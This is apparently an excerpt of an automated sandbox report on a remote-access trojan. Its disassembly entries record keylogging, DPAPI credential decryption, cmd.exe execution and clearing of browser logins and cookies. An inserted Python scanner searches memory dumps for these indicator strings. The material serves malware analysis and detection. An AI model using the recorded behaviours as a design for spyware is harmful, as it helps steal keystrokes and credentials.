• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
• API String ID: 1497725170-1359877963
• Opcode ID: e4552b0192bd537bdbb23f0e75db06edbf34c480acb40bb552d9b356009e7e4b
• Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
• Opcode Fuzzy Hash: e4552b0192bd537bdbb23f0e75db06edbf34c480acb40bb552d9b356009e7e4b
• Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
• CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
• CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
• CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: c54ea447ec553110fbd8b6a53cbfd27dae09f4e423abdb6fb40980f5ac29de0a
• Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
• Opcode Fuzzy Hash: c54ea447ec553110fbd8b6a53cbfd27dae09f4e423abdb6fb40980f5ac29de0a
• Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
• GetProcAddress.KERNEL32(00000000), ref: 00406A89
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: CryptUnprotectData$crypt32
• API String ID: 2574300362-2380590389
• Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
• Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
• Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
• Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
• CloseHandle.KERNEL32(?), ref: 004051CA
• SetEvent.KERNEL32(?), ref: 004051D9
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
• Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
• Opcode Fuzzy Hash: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
• Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
Uniqueness

Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-1866435925
• Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
• Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
• Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
• Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
• RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
• RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: 210aa44c52a68b7c494be322e069a8729df8d16b2189e0ff8345c6a7aa3328f8
• Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
• Opcode Fuzzy Hash: 210aa44c52a68b7c494be322e069a8729df8d16b2189e0ff8345c6a7aa3328f8
• Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
Uniqueness

Uniqueness Score: -1.00%
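The function entries above (keylogger banners and the wsprintfW timestamp format, the dynamic crypt32 / CryptUnprotectData import that precedes DPAPI decryption of stored credentials, the "Connection Timeout" message and the pth_unenc value written under HKEY_CURRENT_USER) give an analyst a compact string set to hunt for in other dumps. The following is an added example, not code from the Joe Sandbox report or from Remcos itself: an offline scanner that searches a memory dump or unpacked image for those strings in both ANSI and UTF-16LE (the report does not state the encoding of each string, so both are tried), maps hits to the behaviour the surrounding API calls imply (the behaviour labels are this example's own, not report fields), and parses keylog timestamps written with the "[%04i/%02i/%02i %02i:%02i:%02i $]" format. The dump bytes and keylog text are constructed for the example.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Strings taken from the API/String entries above, grouped by the behaviour
# the surrounding API calls imply (grouping is this example's assumption).
INDICATORS = {
    "keylogger": [
        "Offline Keylogger Started",
        "Online Keylogger Started",
        "[%04i/%02i/%02i %02i:%02i:%02i $]",   # wsprintfW timestamp format
    ],
    "dpapi_credential_access": ["crypt32", "CryptUnprotectData"],
    "c2_timeout": ["Connection Timeout"],
    "registry_config": ["pth_unenc"],
}

# The report does not say which strings are ANSI and which are wide, so
# every indicator is searched in both encodings.
ENCODINGS = (("ansi", "ascii"), ("utf-16le", "utf-16-le"))


@dataclass(frozen=True)
class Hit:
    offset: int
    behaviour: str
    text: str
    encoding: str


def scan_blob(blob: bytes) -> list[Hit]:
    """Return every indicator occurrence in blob, ordered by offset."""
    hits = []
    for behaviour, strings in INDICATORS.items():
        for s in strings:
            for label, codec in ENCODINGS:
                needle = re.escape(s.encode(codec))
                for m in re.finditer(needle, blob):
                    hits.append(Hit(m.start(), behaviour, s, label))
    return sorted(hits, key=lambda h: h.offset)


def assess(blob: bytes) -> dict[str, bool]:
    """Collapse raw hits into per-behaviour verdicts."""
    found = {h.text for h in scan_blob(blob)}
    return {
        "keylogger": any(s in found for s in INDICATORS["keylogger"]),
        # "crypt32" alone is common in benign code; require the pair that the
        # LoadLibraryA/GetProcAddress entry above resolves at run time.
        "dpapi_credential_access": {"crypt32", "CryptUnprotectData"} <= found,
        "c2_timeout": "Connection Timeout" in found,
        "registry_config": "pth_unenc" in found,
    }


# Regex equivalent of the wsprintfW format "[%04i/%02i/%02i %02i:%02i:%02i $]".
TIMESTAMP_RE = re.compile(
    r"\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) \$\]"
)


def keylog_timestamps(text: str) -> list[datetime]:
    """Extract the session timestamps from keylog text using that format."""
    return [datetime(*map(int, m.groups())) for m in TIMESTAMP_RE.finditer(text)]


# Constructed sample dump: wide and ANSI indicators separated by filler bytes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "Online Keylogger Started".encode("utf-16-le")
    + b"\x90" * 8
    + b"crypt32\x00CryptUnprotectData\x00"
    + b"\xcc" * 4
    + "pth_unenc".encode("utf-16-le")
    + b"\x00" * 4
    + b"Connection Timeout\x00"
)

# Constructed sample keylog text in the format the wsprintfW call emits.
SAMPLE_KEYLOG = "[2024/04/23 10:15:32 $]\r\nhello[2024/04/23 10:16:05 $]\r\nworld"


if __name__ == "__main__":
    for h in scan_blob(SAMPLE_DUMP):
        print(f"{h.offset:#08x} {h.behaviour:<24} {h.encoding:<8} {h.text!r}")
    print(assess(SAMPLE_DUMP))
    print(keylog_timestamps(SAMPLE_KEYLOG))
```

Run it against a real dump by replacing SAMPLE_DUMP with the file contents; the per-behaviour verdicts are deliberately conservative (the DPAPI verdict needs both the library and the export name) so a single generic string does not raise the flag on its own.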

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
• Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
• Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
• Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
• Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                                                                                                                                    • ShowWindow.USER32(00000009), ref: 00416C61
                                                                                                                                                                    • SetForegroundWindow.USER32 ref: 00416C6D
                                                                                                                                                                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                                                                                                                                      • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                                                                                                                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                                                                                                                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                                                    • String ID: !D@
                                                                                                                                                                    • API String ID: 186401046-604454484
                                                                                                                                                                    • Opcode ID: 270a81812c9a9c954965cfdd6a4c81df0ea1f3669daa27631f06eddb7f53d270
                                                                                                                                                                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                                                                                                                                    • Opcode Fuzzy Hash: 270a81812c9a9c954965cfdd6a4c81df0ea1f3669daa27631f06eddb7f53d270
                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExecuteShell
                                                                                                                                                                    • String ID: /C $cmd.exe$open
                                                                                                                                                                    • API String ID: 587946157-3896048727
                                                                                                                                                                    • Opcode ID: 923967a6fd708c61b5fab5092c6e20093a8ff39dac1bf6b49590002de37b7fcd
                                                                                                                                                                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                                                                                                                    • Opcode Fuzzy Hash: 923967a6fd708c61b5fab5092c6e20093a8ff39dac1bf6b49590002de37b7fcd
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • TerminateThread.KERNEL32(Function_0000A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                                                                                                                    • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                                                                                                    • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                    • String ID: pth_unenc
                                                                                                                                                                    • API String ID: 3123878439-4028850238
                                                                                                                                                                    • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                                                                                                                    • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                                                                                                                                    • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                    • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                                                                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                                                                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                    • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                                                                                                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                                                                                                                                    • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                                                                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                                                                                                                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                                                                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,274C6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 274C8731
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 274C87BA
                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 274C87CC
                                                                                                                                                                    • __freea.LIBCMT ref: 274C87D5
                                                                                                                                                                      • Part of subcall function 274C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 274C5702
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: 8ed4c0a55ee5052b9195ce67e45420a477f64fad6c0a63b20c03f12da482926e
• Instruction ID: e314b96fdb02994ac375e0b23be7138f3d2fc2e990de3f1b64fd3c78dc07b3b1
• Opcode Fuzzy Hash: 8ed4c0a55ee5052b9195ce67e45420a477f64fad6c0a63b20c03f12da482926e
• Instruction Fuzzy Hash: 3031AE36A0121AEBDF15CF65CC82EEF7BA9EB40610F11016DED04D6250EB35D991CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• Cleared browsers logins and cookies., xrefs: 0040C0F5
• [Cleared browsers logins and cookies.], xrefs: 0040C0E4
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
• Opcode ID: bc362d70cf4f5ad946d2d6bce893b7e03ef5b56e408b8141a290fd3d2dbf3af0
• Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
• Opcode Fuzzy Hash: bc362d70cf4f5ad946d2d6bce893b7e03ef5b56e408b8141a290fd3d2dbf3af0
• Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
• Sleep.KERNEL32(000001F4), ref: 0040A573
• Sleep.KERNEL32(00000064), ref: 0040A5FD
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
• Opcode ID: 4c3b9bacc57519028fcd34de768ed373910ab361816e09fd73b4648e02698e55
• Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
• Opcode Fuzzy Hash: 4c3b9bacc57519028fcd34de768ed373910ab361816e09fd73b4648e02698e55
• Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: SystemTimes$Sleep__aulldiv
• String ID:
• API String ID: 188215759-0
• Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
• Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
• Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
• Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
• Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
• Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
• Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
• Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
• Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
• Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
Uniqueness
Uniqueness Score: -1.00%

APIs
